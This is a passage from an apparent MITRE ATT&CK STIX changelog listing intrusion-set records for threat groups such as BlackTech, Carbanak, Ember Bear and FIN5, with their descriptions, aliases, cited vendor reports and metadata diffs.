"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + }, + { + "source_name": "Trend Micro Tick November 2019", + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. 
Retrieved June 9, 2020.", + "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + }, + { + "source_name": "Symantec Tick Apr 2016", + "description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.", + "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Trend Micro Incorporated" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:57.719000+00:00\", \"old_value\": \"2025-04-16 20:37:34.368000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--9735c036-8ebe-47e9-9c77-b0ae656dab93", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-21 14:52:49.596000+00:00", + "modified": "2025-04-25 14:48:58.613000+00:00", + "name": "BackdoorDiplomacy", + "description": "[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) is a cyber espionage threat group that has been active since at least 2017. 
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.(Citation: ESET BackdoorDiplomacy Jun 2021)", + "aliases": [ + "BackdoorDiplomacy" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0135", + "external_id": "G0135" + }, + { + "source_name": "ESET BackdoorDiplomacy Jun 2021", + "description": "Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021", + "url": "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Zaw Min Htun, @Z3TAE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:58.613000+00:00\", \"old_value\": \"2025-04-16 20:37:34.519000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--da49b9f1-ca99-443f-9728-0a074db66850", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:49:40.224000+00:00", + "name": "BlackOasis", + "description": "[BlackOasis](https://attack.mitre.org/groups/G0063) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. 
(Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017) A group known by Microsoft as [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)", + "aliases": [ + "BlackOasis" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0063", + "external_id": "G0063" + }, + { + "source_name": "BlackOasis", + "description": "(Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017)" + }, + { + "source_name": "Securelist BlackOasis Oct 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.", + "url": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + }, + { + "source_name": "Securelist APT Trends Q2 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.", + "url": "https://securelist.com/apt-trends-report-q2-2017/79332/" + }, + { + "source_name": "CyberScoop BlackOasis Oct 2017", + "description": "Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. 
Retrieved February 15, 2018.", + "url": "https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:40.224000+00:00\", \"old_value\": \"2025-04-16 20:37:41.036000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-05 18:36:45.970000+00:00", + "modified": "2025-04-25 19:03:07.787000+00:00", + "name": "BlackTech", + "description": "[BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. 
[BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)", + "aliases": [ + "BlackTech", + "Palmerworm" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0098", + "external_id": "G0098" + }, + { + "source_name": "Palmerworm", + "description": "(Citation: Symantec Palmerworm Sep 2020)(Citation: IronNet BlackTech Oct 2021)" + }, + { + "source_name": "TrendMicro BlackTech June 2017", + "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" + }, + { + "source_name": "IronNet BlackTech Oct 2021", + "description": "Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.", + "url": "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + }, + { + "source_name": "Reuters Taiwan BlackTech August 2020", + "description": "Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.", + "url": "https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK" + }, + { + "source_name": "Symantec Palmerworm Sep 2020", + "description": "Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. 
Retrieved March 25, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc.", + "Hannah S" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 19:03:07.787000+00:00\", \"old_value\": \"2025-04-16 20:37:33.408000+00:00\"}, \"root['x_mitre_contributors'][1]\": {\"new_value\": \"Hannah S\", \"old_value\": \"Hannah Simes, BT Security\"}}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--55033a4d-3ffe-46b2-99b4-2c1541e9ce1c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:49.021000+00:00", + "modified": "2025-04-25 14:49:30.378000+00:00", + "name": "Carbanak", + "description": "[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. 
[Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)", + "aliases": [ + "Carbanak", + "Anunak" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0008", + "external_id": "G0008" + }, + { + "source_name": "Carbanak", + "description": "(Citation: Kaspersky Carbanak) (Citation: Fox-It Anunak Feb 2015)" + }, + { + "source_name": "Anunak", + "description": "(Citation: Fox-It Anunak Feb 2015)" + }, + { + "source_name": "Kaspersky Carbanak", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved August 23, 2018.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "Europol Cobalt Mar 2018", + "description": "Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.", + "url": "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "description": "CTU. (n.d.). GOLD NIAGARA. 
Retrieved September 21, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara" + }, + { + "source_name": "Secureworks GOLD KINGSWOOD Threat Profile", + "description": "Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain" + }, + { + "source_name": "Fox-It Anunak Feb 2015", + "description": "Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.", + "url": "https://www.fox-it.com/en/news/blog/anunak-aka-carbanak-update/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Anastasios Pingios" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:30.378000+00:00\", \"old_value\": \"2025-04-16 20:37:39.338000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:49:28.547000+00:00", + "name": "DarkHydrus", + "description": "[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. 
(Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)", + "aliases": [ + "DarkHydrus" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0079", + "external_id": "G0079" + }, + { + "source_name": "DarkHydrus", + "description": "(Citation: Unit 42 DarkHydrus July 2018)" + }, + { + "source_name": "Unit 42 DarkHydrus July 2018", + "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" + }, + { + "source_name": "Unit 42 Playbook Dec 2017", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "url": "https://pan-unit42.github.io/playbook_viewer/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Oleg Skulkin, Group-IB" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:28.547000+00:00\", \"old_value\": \"2025-04-16 20:37:39.039000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-15 13:07:26.651000+00:00", + "modified": "2025-04-25 14:49:05.248000+00:00", + "name": "DarkVishnya", + "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat 
actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)", + "aliases": [ + "DarkVishnya" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0105", + "external_id": "G0105" + }, + { + "source_name": "DarkVishnya", + "description": "(Citation: Securelist DarkVishnya Dec 2018)" + }, + { + "source_name": "Securelist DarkVishnya Dec 2018", + "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020.", + "url": "https://securelist.com/darkvishnya/89169/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:05.248000+00:00\", \"old_value\": \"2025-04-16 20:37:35.190000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--a7f57cc1-4540-4429-823f-f4e56b8473c9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-06-09 14:49:57.704000+00:00", + "modified": "2025-04-25 19:03:38.177000+00:00", + "name": "Ember Bear", + "description": "[Ember Bear](https://attack.mitre.org/groups/G1003) is a Russian state-sponsored cyber espionage group that has been active since at least 2020, linked to Russia's General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155).(Citation: CISA GRU29155 2024) [Ember Bear](https://attack.mitre.org/groups/G1003) has 
primarily focused operations against Ukrainian government and telecommunication entities, but has also operated against critical infrastructure entities in Europe and the Americas.(Citation: Cadet Blizzard emerges as novel threat actor) [Ember Bear](https://attack.mitre.org/groups/G1003) conducted the [WhisperGate](https://attack.mitre.org/software/S0689) destructive wiper attacks against Ukraine in early 2022.(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)(Citation: CISA GRU29155 2024) There is some confusion as to whether [Ember Bear](https://attack.mitre.org/groups/G1003) overlaps with another Russian-linked entity referred to as [Saint Bear](https://attack.mitre.org/groups/G1031). At present available evidence strongly suggests these are distinct activities with different behavioral profiles.(Citation: Cadet Blizzard emerges as novel threat actor)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )", + "aliases": [ + "Ember Bear", + "UNC2589", + "Bleeding Bear", + "DEV-0586", + "Cadet Blizzard", + "Frozenvista", + "UAC-0056" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1003", + "external_id": "G1003" + }, + { + "source_name": "DEV-0586", + "description": "(Citation: Cadet Blizzard emerges as novel threat actor)" + }, + { + "source_name": "Cadet Blizzard", + "description": "(Citation: Cadet Blizzard emerges as novel threat actor)" + }, + { + "source_name": "Frozenvista", + "description": "(Citation: CISA GRU29155 2024)" + }, + { + "source_name": "UAC-0056", + "description": "(Citation: CISA GRU29155 2024)" + }, + { + "source_name": "Bleeding Bear", + "description": "(Citation: CrowdStrike Ember Bear Profile March 2022)" + }, + { + "source_name": "UNC2589", + "description": "(Citation: Mandiant UNC2589 March 2022)" + }, + { + "source_name": "CrowdStrike Ember Bear Profile March 2022", + "description": "CrowdStrike. 
(2022, March 30). Who is EMBER BEAR?. Retrieved June 9, 2022.", + "url": "https://www.crowdstrike.com/blog/who-is-ember-bear/" + }, + { + "source_name": "Cadet Blizzard emerges as novel threat actor", + "description": "Microsoft Threat Intelligence. (2023, June 14). Cadet Blizzard emerges as a novel and distinct Russian threat actor. Retrieved July 10, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/" + }, + { + "source_name": "Mandiant UNC2589 March 2022", + "description": "Sadowski, J; Hall, R. (2022, March 4). Responses to Russia's Invasion of Ukraine Likely to Spur Retaliation. Retrieved June 9, 2022.", + "url": "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation" + }, + { + "source_name": "Palo Alto Unit 42 OutSteel SaintBot February 2022 ", + "description": "Unit 42. (2022, February 25). Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot. Retrieved June 9, 2022.", + "url": "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/" + }, + { + "source_name": "CISA GRU29155 2024", + "description": "US Cybersecurity & Infrastructure Security Agency et al. (2024, September 5). Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure. 
Retrieved September 6, 2024.", + "url": "https://www.cisa.gov/sites/default/files/2024-09/aa24-249a-russian-military-cyber-actors-target-us-and-global-critical-infrastructure.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Hannah S" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 19:03:38.177000+00:00\", \"old_value\": \"2024-12-03 20:19:38.721000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Hannah S\", \"old_value\": \"Hannah Simes, BT Security\"}}}", + "previous_version": "2.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--96e239be-ad99-49eb-b127-3007b8c1bec9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:54.697000+00:00", + "modified": "2025-04-25 14:48:45.400000+00:00", + "name": "Equation", + "description": "[Equation](https://attack.mitre.org/groups/G0020) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)", + "aliases": [ + "Equation" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0020", + "external_id": "G0020" + }, + { + "source_name": "Equation", + "description": "(Citation: Kaspersky Equation QA)" + }, + { + "source_name": "Kaspersky Equation QA", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. 
Retrieved December 21, 2015.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:45.400000+00:00\", \"old_value\": \"2025-04-16 20:37:33.110000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--1f0f9a14-11aa-49aa-9174-bcd0eaa979de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-22 16:46:17.790000+00:00", + "modified": "2025-04-25 14:49:26.766000+00:00", + "name": "Evilnum", + "description": "[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018.(Citation: ESET EvilNum July 2020)", + "aliases": [ + "Evilnum" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0120", + "external_id": "G0120" + }, + { + "source_name": "Evilnum", + "description": "(Citation: ESET EvilNum July 2020)" + }, + { + "source_name": "ESET EvilNum July 2020", + "description": "Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. 
Retrieved January 22, 2021.", + "url": "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:26.766000+00:00\", \"old_value\": \"2025-04-16 20:37:38.720000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:49:23.588000+00:00", + "name": "FIN5", + "description": "[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)", + "aliases": [ + "FIN5" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0053", + "external_id": "G0053" + }, + { + "source_name": "FIN5", + "description": "(Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "FireEye Respond Webinar July 2017", + "description": "Scavella, T. and Rifki, A. (2017, July 20). 
Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.", + "url": "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html" + }, + { + "source_name": "Mandiant FIN5 GrrCON Oct 2016", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8" + }, + { + "source_name": "DarkReading FireEye FIN5 Oct 2015", + "description": "Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.", + "url": "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Walker Johnson" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:23.588000+00:00\", \"old_value\": \"2025-04-16 20:37:38.089000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--6566aac9-dad8-4332-ae73-20c23bad7f02", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-28 17:41:12.950000+00:00", + "modified": "2025-04-25 14:49:38.455000+00:00", + "name": "Ferocious Kitten", + "description": "[Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)", + "aliases": [ + "Ferocious Kitten" + ], + "revoked": 
false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0137", + "external_id": "G0137" + }, + { + "source_name": "Kaspersky Ferocious Kitten Jun 2021", + "description": "GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.", + "url": "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Manikantan Srinivasan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:38.455000+00:00\", \"old_value\": \"2025-04-16 20:37:40.731000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--0ea72cd5-ca30-46ba-bc04-378f701c658f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:05.611000+00:00", + "modified": "2025-04-25 14:49:37.572000+00:00", + "name": "GCMAN", + "description": "[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. 
